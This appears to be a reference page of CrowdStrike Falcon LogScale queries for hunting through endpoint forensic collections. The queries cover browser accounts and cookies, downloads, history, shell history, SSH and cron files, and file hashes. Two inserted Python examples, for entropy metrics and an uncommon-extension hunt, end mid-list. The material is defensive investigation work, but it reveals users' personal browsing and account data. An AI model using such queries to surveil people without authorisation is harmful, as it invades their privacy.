ForensicsCollectorLog

Show all Fields

#event_simpleName = ForensicsCollectorLog ForensicsCollectionIdentifier = * | "Log Text" := rename(FfcCollectorLogText) | Module := rename(FfcModule) | "Log Level" := rename(FfcLogLevel) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, id, "Log Level", Module, "Log Text"], limit=max)

AutorunProcessInfo

Show all Fields

#event_simpleName = AutoRunProcessInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, CommandLineParameters, FfcAutoRunType, TargetFileName], limit=max)

Show Fields Matching CommandLineParameters

#event_simpleName = AutoRunProcessInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | CommandLineParameters = "PARAMETER" | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, CommandLineParameters, FfcAutoRunType, TargetFileName], limit=max)
Note: Replace PARAMETER with a parameter. PARAMETER is typically a path and globs can be used, such as /usr/libexec/*.

BrowserAccount

Show all Fields

#event_simpleName = BrowserAccountInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserAccountId, BrowserArtifactType, BrowserAccountEmail, BrowserAccountFullName, BrowserAccountGivenName, BrowserAccountEmailDomain, BrowserAccountIsSupervisedChild, BrowserAccountIsUnderAdvancedProtection, BrowserLocale, SourceFileName, UserName], limit=max)

Show browser accounts with common private email domain

#event_simpleName = BrowserAccountInfo ForensicsCollectionIdentifier = * | BrowserAccountEmail=*gmail.com OR BrowserAccountEmail=*hotmail.com OR BrowserAccountEmail=*yahoo.com OR BrowserAccountEmail=*outlook.com OR BrowserAccountEmail=*icloud.com | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserAccountId, BrowserArtifactType, BrowserAccountEmail, BrowserAccountFullName, BrowserAccountGivenName, BrowserAccountEmailDomain, BrowserAccountIsSupervisedChild, BrowserAccountIsUnderAdvancedProtection, BrowserLocale, SourceFileName, UserName], limit=max)

BrowserCookie

Show all Fields

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserName = BROWSERNAME | table([aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieLastAccessed, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome. The BrowserName line can also be used in other queries to filter by browser.

Show cookies from a specific site

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserCookieHost = <site of interest> | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)
Note: Replace with site name. You can use wildcards such as "*google.com".

BrowserDownloadStarted

Show all Fields

#event_simpleName=BrowserDownloadStarted | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Size, TargetFileName, SourceFileName, BrowserDownloadLastAccessed, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, MimeType, BrowserDownloadFileState, BrowserDownloadFileOpened, BrowserDownloadSiteUrl, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome.

Show downloaded files from a specific site

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserDownloadSiteUrl = <site of interest> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace with site name. You can use wildcards such as "*google.com*".

Show abnormally large files

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Size > <fill in bytes here> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Change with the number of bytes you're looking for.

BrowserDownloadEnd

Show all Fields

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome.

Show downloaded files from a specific site

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserDownloadSiteUrl = <site of interest> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace with site name. You can use wildcards such as "*google.com*".

Show abnormally large files

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Size > <fill in bytes here> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Change with the number of bytes you're looking for.

BrowserExtensionInfo

Show all Fields

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome.

Show if extension of interest is installed

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserExtensionName = <Extension Name> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)
Note: Replace <Extension Name> with the name of the extension of interest.

BrowserHistoryVisit

Show all Fields

#event_simpleName=BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Title, BrowserVisitCount, BrowserUrlTypedCount, BrowserVisitType, Id, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastModifiedTimeStamp], limit=max)

Show Fields Matching Browser

#event_simpleName=BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastModifiedTimeStamp, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with browser name, such as Safari, Firefox, Chrome.

Show sites that were manually navigated to (TYPED)

#event_simpleName = BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserVisitType = TYPED | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastModifiedTimeStamp, SourceFileName, UserName], limit=max)

Show visits to a specific URL

#event_simpleName = BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Url = URL | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastModifiedTimeStamp, SourceFileName, UserName], limit=max)
Note: Replace URL with the URL you're investigating.

BrowserHistoryClearInfo

Show all Fields

#event_simpleName = BrowserHistoryClearInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserClearedDataPeriodBasic, BrowserClearedDataPeriodAdvanced, BrowserClearedDataCookiesBasic, BrowserClearedDataCookiesAdvanced, BrowserClearedFormData, BrowserClearedHostedAppsData, BrowserClearedPasswords, BrowserClearedSiteSettings, SourceFileName, UserName], limit=max)

BrowserProxy

Show all Fields

#event_simpleName = BrowserProxyInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserProxyType, BrowserProxyUrlHttp, BrowserProxyPortHttp, BrowserProxyUrlSsl, BrowserProxyPortSsl, BrowserProxyPacUrl, BrowserProxyAllowlist, BrowserProxyShare, SourceFileName, UserName], limit=max)

Show manually set proxy settings

#event_simpleName = BrowserProxyInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserProxyType = MANUAL_PROXY | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserProxyType, BrowserProxyUrlHttp, BrowserProxyPortHttp, BrowserProxyUrlSsl, BrowserProxyPortSsl, BrowserProxyPacUrl, BrowserProxyAllowlist, BrowserProxyShare, SourceFileName, UserName], limit=max)

Entropy

Show all fields for EntropyScan

#event_simpleName=EntropyScan ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FileIdentifier, BytesScanned, ShannonEntropy, AverageWordLength, AverageLineLength, MaxLineLength, WhitespaceRatio, SpecialCharactersRatio], limit=max)
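To make the EntropyScan fields concrete, the following is an added Python example (not CrowdStrike's code) that computes comparable metrics over constructed input, so an analyst can see what a ShannonEntropy near 8.0 or a high SpecialCharactersRatio looks like on known data. The field definitions it uses are assumptions; the page does not give the sensor's own formulas.

```python
"""EntropyScan-style file metrics on known input.

Added example, not CrowdStrike's code. The metric definitions below are
assumptions chosen to match the field names of the EntropyScan event; the
sensor's exact formulas are not documented on the page.
"""
import math
from collections import Counter

ASCII_WHITESPACE = b" \t\n\r\x0b\x0c"


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte.

    0.0 for a single repeated byte value, 8.0 for a uniform spread over all
    256 values. Compressed, encrypted or packed content sits close to 8.0,
    which is why the metric is useful when hunting for staged payloads.
    """
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def entropy_scan(data: bytes) -> dict:
    """Return a dict keyed like the EntropyScan fields (definitions assumed).

    AverageWordLength: mean length of ASCII-whitespace-separated tokens.
    AverageLineLength / MaxLineLength: over lines split on '\\n', ignoring
    the empty tail produced by a trailing newline.
    WhitespaceRatio: ASCII whitespace bytes / BytesScanned.
    SpecialCharactersRatio: bytes that are neither ASCII alphanumeric nor
    whitespace / BytesScanned.
    """
    total = len(data)
    lines = data.split(b"\n")
    if lines and lines[-1] == b"":
        lines = lines[:-1]
    words = data.split()
    whitespace = sum(1 for b in data if b in ASCII_WHITESPACE)
    special = sum(
        1 for b in data
        if b not in ASCII_WHITESPACE and not bytes([b]).isalnum()
    )
    return {
        "BytesScanned": total,
        "ShannonEntropy": round(shannon_entropy(data), 4),
        "AverageWordLength": round(sum(map(len, words)) / len(words), 4) if words else 0.0,
        "AverageLineLength": round(sum(map(len, lines)) / len(lines), 4) if lines else 0.0,
        "MaxLineLength": max(map(len, lines)) if lines else 0,
        "WhitespaceRatio": round(whitespace / total, 4) if total else 0.0,
        "SpecialCharactersRatio": round(special / total, 4) if total else 0.0,
    }


def flag_high_entropy(metrics: dict, threshold: float = 7.0) -> bool:
    """Triage helper: True when ShannonEntropy exceeds `threshold`.

    The 7.0 bits/byte cut-off is an assumption for illustration; tune it
    against your own baseline of legitimate compressed files.
    """
    return metrics["ShannonEntropy"] > threshold


# Constructed samples: a short shell-config-like text and a byte blob that
# covers every value 0..255 uniformly (entropy exactly 8.0).
SAMPLE_TEXT = b"export PATH=/usr/local/bin:$PATH\nalias ll='ls -la'\n"
SAMPLE_UNIFORM_BLOB = bytes(range(256)) * 4

if __name__ == "__main__":
    for label, blob in (("text", SAMPLE_TEXT), ("uniform blob", SAMPLE_UNIFORM_BLOB)):
        m = entropy_scan(blob)
        print(label, m, "high entropy:", flag_high_entropy(m))
```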

EnvVars

Show all Fields

#event_simpleName=RuntimeEnvironmentVariable ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, EnvironmentVariableName, EnvironmentVariableValue], limit=max)

EventTapInfo

Show all Fields

#event_simpleName = EventTapInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, SourceProcessId, TargetProcessId, EventTapId, EventTapEventsOfInterest, EventTapIsEnabled, EventTapOptions, EventTapPoint, name], limit=max)

Search By Large Event Tap Events of Interest

#event_simpleName = EventTapInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | EventTapEventsOfInterest = NUMBEREVENTS | table([time, aid, cid, ForensicsCollectionIdentifier, SourceProcessId, TargetProcessId, EventTapId, EventTapEventsOfInterest, EventTapIsEnabled, EventTapOptions, EventTapPoint], limit=max)
Note: Replace NUMBEREVENTS with the number of events.

FileEntry

Show all Fields

#event_simpleName=FileEntry ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Reassemble files by line

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max) | sort([TargetFileName, Line], order=asc, limit=max)
Note: Replace the * after ForensicsCollectionIdentifier with the collection ID you're investigating.

Shell history

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SHELL_HISTORY | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

SSH configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SSH_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Known hosts

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_KNOWN_HOSTS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Shell configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SHELL_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Authorized keys

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_AUTHORIZED_KEYS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Cron jobs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SCHEDULED | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System start configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_START | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System stop configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_STOP | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Kernel modules

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_KERN_MODULES | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

FileTimestampMetadata

Show all Fields

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcFileChangeType, FfcFileIdentifier, PosixFileType, TargetFileName, aid, cid, ForensicsCollectionIdentifier], limit=max)

FileInfo

Show all Fields

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, Size, UserName, MD5HashData, SHA1HashData, SHA256HashData, FileHeader, UnixGroupName, PosixFileType, UserSecurityDomain, TargetFileExtension, CompanyName, ImageInternalName, FileDescription, FileVersion, FileLegalCopyRight, CertificateExists, OriginalFilename, ProductName, ProductVersion], limit=max)

Hunt uncommon file extensions

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | NOT (TargetFileName=*.jpg OR TargetFileName=*.png OR TargetFileName=*.pdf OR TargetFileName=*.jpeg OR TargetFileName=*.csv OR TargetFileName=*.xls OR TargetFileName=*.xlsx OR TargetFileName=*.doc OR TargetFileName=*.docx OR TargetFileName=*.html OR TargetFileName=*.gif OR TargetFileName=*.txt OR TargetFileName=*.ppt OR TargetFileName=*.pptx OR TargetFileName=*.log OR TargetFileName=*.htm OR TargetFileName=*.class OR TargetFileName=*.json OR TargetFileName=*.xml OR TargetFileName=*.xhtml) | regex("/(?<filename>(?<name>\w+)\.(?<extension>\w{1,5}))$", field=TargetFileName) | groupby([extension], function=[collect([aid, ContextTimeStamp, TargetFileName, SHA256HashData, name, extension]), count(extension)], limit=max) | _count < 100 | table([aid, ContextTimeStamp, TargetFileName, SHA256HashData, name, extension, _count], limit=max)
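The filter above is easy to misread, so here is an added Python example (not CrowdStrike's code) that reproduces its steps offline on constructed FileInfo-style records: the common-extension exclusion, the name/extension regex (which silently drops paths with no extension or a double extension), the per-extension count and the `_count < 100` cut-off. The sample records and the configurable threshold are assumptions for illustration.

```python
"""Offline re-implementation of the 'Hunt uncommon file extensions' query.

Added example, not CrowdStrike's code. It applies the query's steps to a list
of FileInfo-like dicts (constructed below) so the filter logic can be checked
without a Falcon tenant.
"""
import re
from collections import defaultdict

# Extensions the query's NOT (...) clause drops before anything else.
COMMON_EXTENSIONS = (
    "jpg", "png", "pdf", "jpeg", "csv", "xls", "xlsx", "doc", "docx", "html",
    "gif", "txt", "ppt", "pptx", "log", "htm", "class", "json", "xml", "xhtml",
)

# Same pattern as the query's regex(): "/name.ext" anchored at the end of the
# path (Python spells named groups (?P<name>...)). A path with no dot after
# the last '/' or with a double extension such as archive.tar.gz does not
# match; regex() in CQL drops non-matching events, and so does this code.
FILENAME_RE = re.compile(r"/(?P<filename>(?P<name>\w+)\.(?P<extension>\w{1,5}))$")

RARE_THRESHOLD = 100  # the query's `_count < 100`


def hunt_uncommon_extensions(records, threshold=RARE_THRESHOLD):
    """Return the rows the query would table: one per file whose extension
    occurs fewer than `threshold` times across the collection."""
    groups = defaultdict(list)  # extension -> rows with that extension
    for rec in records:
        path = rec["TargetFileName"]
        # NOT (TargetFileName=*.jpg OR ...): suffix match, case-sensitive here.
        if any(path.endswith("." + ext) for ext in COMMON_EXTENSIONS):
            continue
        m = FILENAME_RE.search(path)
        if m is None:
            continue  # no "/name.ext" at end of path: event is filtered out
        groups[m.group("extension")].append({
            "aid": rec["aid"],
            "ContextTimeStamp": rec["ContextTimeStamp"],
            "TargetFileName": path,
            "SHA256HashData": rec["SHA256HashData"],
            "name": m.group("name"),
            "extension": m.group("extension"),
        })
    # groupby([extension], ... count(extension)) | _count < threshold
    rows = []
    for members in groups.values():
        if len(members) < threshold:
            rows.extend({**row, "_count": len(members)} for row in members)
    return rows


def _rec(aid, ts, path, sha):
    return {"aid": aid, "ContextTimeStamp": ts, "TargetFileName": path, "SHA256HashData": sha}


# Constructed sample records; aid and hash values are placeholders, not real data.
SAMPLE_RECORDS = [
    _rec("aid-placeholder-1", 1700000000, "/Users/alice/Pictures/holiday.jpg", "sha256-placeholder-1"),
    _rec("aid-placeholder-1", 1700000010, "/Users/alice/Documents/report.pdf", "sha256-placeholder-2"),
    _rec("aid-placeholder-1", 1700000020, "/Users/alice/Downloads/invoice.scr", "sha256-placeholder-3"),
    _rec("aid-placeholder-2", 1700000030, "/tmp/backup1.bak", "sha256-placeholder-4"),
    _rec("aid-placeholder-2", 1700000040, "/tmp/backup2.bak", "sha256-placeholder-5"),
    _rec("aid-placeholder-2", 1700000050, "/tmp/backup3.bak", "sha256-placeholder-6"),
    _rec("aid-placeholder-2", 1700000060, "/opt/data/archive.tar.gz", "sha256-placeholder-7"),
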